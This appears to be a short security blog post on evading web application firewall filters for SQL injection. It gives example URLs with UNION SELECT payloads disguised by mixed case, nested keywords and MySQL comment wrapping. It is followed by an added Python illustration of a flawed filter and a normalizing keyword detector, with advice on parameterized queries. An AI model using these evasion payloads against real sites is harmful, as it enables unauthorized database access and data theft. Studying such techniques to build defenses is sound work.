Function Capitalization Technique: For those WAFs whose signatures only match lowercase keywords, a change of case is enough to bypass the filter:
Query: https://lxy.com/cost.php?id=90 UNION SELECT 1,2,3--
Bypass: http://lxy.com/cost.php?id=-90 uniOn SeLeCt 1,2,3--
Replaced Keywords Technique: For those WAFs that strip certain keywords such as UNION, SELECT, ORDER BY and so on in a single pass, the keyword can be nested inside itself so that what remains after stripping is the original keyword:
Query: http://abcxyz.com/itemdetail.php?id=-57 UNION SELECT 1,2--
Bypass: http://abcxyz.com/itemdetail.php?id=-57 UNIunionON SEselectLECT 1,2--
SQLi: http://xyz.com/pricing.php?id=32 union all select 1,2,3---
Bypassed SQLi: http://xyz.com/pricing.php?id=32 /*!UNION*/+/*!ALL*/+/*!SELECT*/+1,2,3---
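As an added, defender-side illustration that is not part of the original post, the Python below puts a toy filter with exactly the weaknesses described above (lowercase-only matching, single-pass keyword removal) next to a detector that normalizes the input before matching. The keyword list, the function names and the reuse of the page's own parameter values as constructed inputs are assumptions of this example, not any real WAF's ruleset.

```python
import re

# Keywords the toy filter watches for (constructed list, not a real WAF ruleset).
KEYWORDS = ("union", "select", "order by")


def naive_filter(query: str) -> str:
    """Flawed filter mirroring the WAF behaviour described above: it matches
    lowercase keywords only and removes each one in a single pass.
    Returns what such a filter would forward to the database."""
    for kw in KEYWORDS:
        query = query.replace(kw, "")
    return query


def normalize(query: str) -> str:
    """Canonicalise before matching: unwrap MySQL /*! ... */ and plain
    /* ... */ comments (keeping their contents), treat '+' as a space,
    collapse runs of whitespace and lowercase everything."""
    q = re.sub(r"/\*!?(.*?)\*/", r" \1 ", query, flags=re.S)
    q = q.replace("+", " ")
    q = re.sub(r"\s+", " ", q).strip()
    return q.lower()


def detect_sql_keywords(query: str) -> list:
    """Detection rather than stripping: report every watched keyword that is
    present once the input has been normalized.  Substring matching is used
    deliberately so that a keyword rebuilt from the pieces around a nested
    copy (UNIunionON) is still seen."""
    n = normalize(query)
    return [kw for kw in KEYWORDS if kw in n]


if __name__ == "__main__":
    # Constructed inputs: the parameter values shown in the post above.
    samples = [
        "90 UNION SELECT 1,2,3--",
        "-90 uniOn SeLeCt 1,2,3--",
        "-57 UNIunionON SEselectLECT 1,2--",
        "32 /*!UNION*/+/*!ALL*/+/*!SELECT*/+1,2,3---",
        "32",
    ]
    for s in samples:
        print(f"input:     {s}")
        print(f"naive ->   {naive_filter(s)}")
        print(f"detected:  {detect_sql_keywords(s)}\n")
```

The naive filter forwards the second, third and fourth samples to the database with a working UNION SELECT in them, while the normalized detector flags all four. Substring matching after normalization is noisy (it also flags the word "selection"), which is why a keyword filter is at best a detection signal; the control that actually removes the injection is a parameterized query in cost.php, itemdetail.php or pricing.php, because no amount of keyword rewriting reaches a bound parameter.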
Stay Linked!! Ali Tabish